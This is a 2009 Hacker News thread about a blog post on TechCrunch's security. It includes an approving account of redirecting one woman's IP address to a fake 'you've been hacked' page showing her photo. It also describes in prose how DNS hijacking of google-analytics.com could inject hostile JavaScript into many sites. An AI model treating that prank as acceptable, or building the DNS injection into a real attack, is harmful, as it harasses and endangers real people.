

TechCrunch: Skating on Thin Ice - jgrahamc
http://www.jgc.org/blog/2009/07/techcrunch-skating-on-thin-ice.html

======
tdavis
I never, ever gloat or make fun of others when it comes to security. It seems
like a no-win situation. If you go to someone privately with security
concerns, you're generally seen as helpful. If I publicly oust somebody, there
are all sorts of people like the author (but far less scrupulous) who might
consider it their duty to knock me down a peg... and I'm no security expert.

Using "password" for a password is really stupid, but "really stupid" is
relative to the knowledge level of the person pointing it out, in most cases.
I'd prefer not to find out what really stupid thing I've done to allow some
script kiddie access to my servers (or whatever the case may be).

~~~
davidw
I actually don't care much for the tone of this article either, for that
matter. It's just a bit off for some reason IMO. Perhaps it comes across as a
bit of gloating itself? I'm not sure, but it's not that big a deal.

~~~
J_McQuade
The tone reminds me exactly of the bit in The Hitchhiker's Guide to the Galaxy
where Slartibartfast calls Arthur Dent "late" in an effete attempt to sound
sinister and threatening...

... but that's probably just me, though.

~~~
jacquesm
'threats... I'm not very good at them, though I'm told they can be quite
effective...'.

------
jgrahamc
A quick follow up. TechCrunch got in contact and we had a quick back and
forth. They confirmed that the security vulnerability I was pointing out was
something they had worried about already and taken action to mitigate.

They also said "We have had thousands of breakin attempts over the past few
days". No surprise really.

And they are planning some posts pointing out the vulnerable nature of apps in
the cloud.

------
IgorCarron
Aren't the situations a little asymmetrical or are they ? How much does a
disruption in Twitter service affect people and how much a disruption in
Techcrunch affect the internet economy.

~~~
Retric
Are you suggesting they are both almost useless?

Edit: On second thought I assume you mean one of them is useful, but I could
not tell from your comment which you though was more useful.

~~~
alex_c
I really think that puts things in perspective a bit.

------
sfphotoarts
I think that what TC are doing with the stolen documents is deplorable
journalism, but his site remains, and is currently unhacked, so I guess he has
the last laugh.

------
vaksel
I'm no "hacking expert" but is hacking nowdays really just you
guessing/stealing a person's password?

~~~
froo
Not all that's involved. Sometimes "hacking" involves creative pranks.

For example, one prank I pulled (which was admittedly pretty basic and silly)
was a creative redirection using .htaccess for a certain someone's fixed IP
address who used to lurk a site I ran last year. This person had an extreme
distaste for me, because of the existence of the site and she would publicly
slander me for something I never did at every available chance.

So I decided to have a little fun with her.

I set up a page with her (publicly available) photo with large text headline
saying that she had been hacked, which the redirection went too.

Total time to setup - less than 3 minutes.

Having her write me a lengthy email me telling me that she was going to call
the police (in Australia) and have me arrested was pretty interesting. I never
responded.

I think I would be freaked out too if the next time I visited someone's blog
(which I was hypothetically consistently leaving trolling/nasty comments on)
there would be my picture there, exclaiming how I'd been hacked.

Sometimes the illusion of having "hacked" someone is just as satisfying as the
real thing, without the messy potential of jail-time.

~~~
jacquesm
Remind me to stay on your good side.

We pulled a similar prank on a guy working on implementing 'verified by visa'.
Every morning he'd walk in to the office and read the same news site. So,
three days before completing the project we cloned the news site and posted an
article that VISA had decided to abandon VBV.

He walks in to the office, starts reading the headlines (-- expletive deleted
--) slams his coffee down and walks out of the office.

To his credit within 20 paces he started laughing like mad, knowing he'd been
had. Pretty clever dude, it would have taken me a bit longer... :)

To protect the guilty and the innocent alike, no further references, but rest
assured that a few words were addressed to VISA execs that were not exactly
pc.

Lots of fun with the DNS.

~~~
jgrahamc
You could do a load of damage with DNS redirection. If you look at the market
penetration of Google Analytics you'll see that a very, very large number of
sites are embedding JavaScript pulled from google-analytics.com in web pages.
Now imagine if you redirected that one domain and served your own JavaScript.
You could include the GA JavaScript as well, but add your own stuff which
would then run in everyone's (within that DNS area) web pages and your
JavaScript could start doing all sorts of nasty things.

~~~
jacquesm
Absolutely, I don't think it will be long before there will be a major hack
like this at some large ISP. The temptation is just too large.

DNS is one of the weak links of the way the web is put together, and
javascript embedded from third party sites nicely exposes that Achilles heel.

Another reason to mistrust open wifi connections :)

------
chanux
I think he is hiding something in his article. Interesting.

~~~
jgrahamc
I'm not hiding anything. I'm just pointing out that this sort of gloating is a
really bad idea. If I had actually broken into TechCrunch's systems do you
think I would post an article about it?

~~~
Herring
Or maybe that's what you want us to think. After that last hack, you'd be
rather high on the suspect list.

~~~
mahmud
Get off the guy's back. That last hack was both clever and responsible. Having
the ability to find security problems does NOT make one a suspect
automatically.

~~~
jacquesm
Actually, in most companies that is exactly what it does.

~~~
jgrahamc
Agreed. I wonder at what point intelligence and knowledge become an arrestable
offense. I own a set of lock picks. If I were to carry these outside of my
home in the UK (since I am not a locksmith) I could be arrested for the
offense of "going equipped"

\---

Section 25 Theft Act 1968

(1) A person shall be guilty of an offence if, when not at his place of abode,
he has with him any article for use in the course of or in connection with any
burglary, theft or cheat.

(3) Where a person is charged with an offence under this section, proof that
he had with him any article made or adapted for use in committing a burglary,
theft or cheat shall be evidence that he had it with him for such use.

\---

Am I "going equipped" on a daily basis?

~~~
jacquesm
The joke goes that a locksmith was arrested for 'going equipped' and he
countered they should arrest him for rape as well...

------
TweedHeads
At least this post will have everybody running like headless chickens at TC
deleting every unethical or compromising evidence and fixing every possible
security hole.

But there will always be one hole left...

~~~
jgrahamc
Or, Michael Arrington could just send me an email and I'll tell him which
machine I'm talking about.

~~~
scorpion032
Would you also let know, which machine it is, if _someone else_ mails you.

~~~
TweedHeads
Hey it is me, Michael Arrington.

Please tell me which machine it is, send info to:

michaelarrington@mailinator.com

Thanks!

~~~
jgrahamc
You think I don't know Michael Arrington's email address, or how to verify
that it's really him?

~~~
biohacker42
I think the @mailinator was a tip off.

